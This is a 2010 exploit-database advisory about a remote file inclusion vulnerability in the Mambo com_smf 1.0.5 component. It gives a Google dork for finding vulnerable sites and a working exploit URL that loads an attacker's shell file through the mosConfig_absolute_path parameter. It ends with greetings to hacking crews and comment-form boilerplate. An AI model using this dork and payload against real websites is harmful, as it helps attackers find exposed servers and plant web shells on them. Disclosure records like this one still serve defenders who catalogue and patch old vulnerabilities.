The Mambo SMF component 1.0.5 remote file inclusion vulnerability

2010.11.06

Credit: jos_ali_joe

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:index.php?option=\"com_smf\"

=========================================================
Mambo Component com_smf 1.0.5 RFI Vulnerability
=========================================================
[+]Title : Mambo Component com_smf 1.0.5 RFI Vulnerability
[+]Software : SMF 1.0.5
[+]Vendor : http://mamboserver.com/
[+]Download : http://download.simplemachines.org/
[+]Author : jos_ali_joe
[+]Contact : josalijoe[at]yahoo[dot]com
[+]Home : http://josalijoe.wordpress.com/
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm jos_ali_joe member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
########################################################################
Dork : inurl:index.php?option="com_smf"
########################################################################
------------------------------------------------------------------------
RFI Exploit
Exploit :
http://example.com/components/com_smf/smf.php?mosConfig_absolute_path=[ Shell txt ]
--------------------------------------------------------------------------
Greets For :
./Devilzc0de crew &#65533; Kebumen Cyber &#65533; Explore Crew &#65533; Indonesian Hacker - Tecon Crew - Security Hub
./Byroe Net - Yogya Carderlink - anten4
My Team : ./Indonesian Coder & inj3ct0r
Special Thanks :
/. google.com
[+] Note :
Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban.
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban,
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

The Mambo SMF component 1.0.5 remote file inclusion vulnerability

Dork: inurl:index.php?option=\"com_smf\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.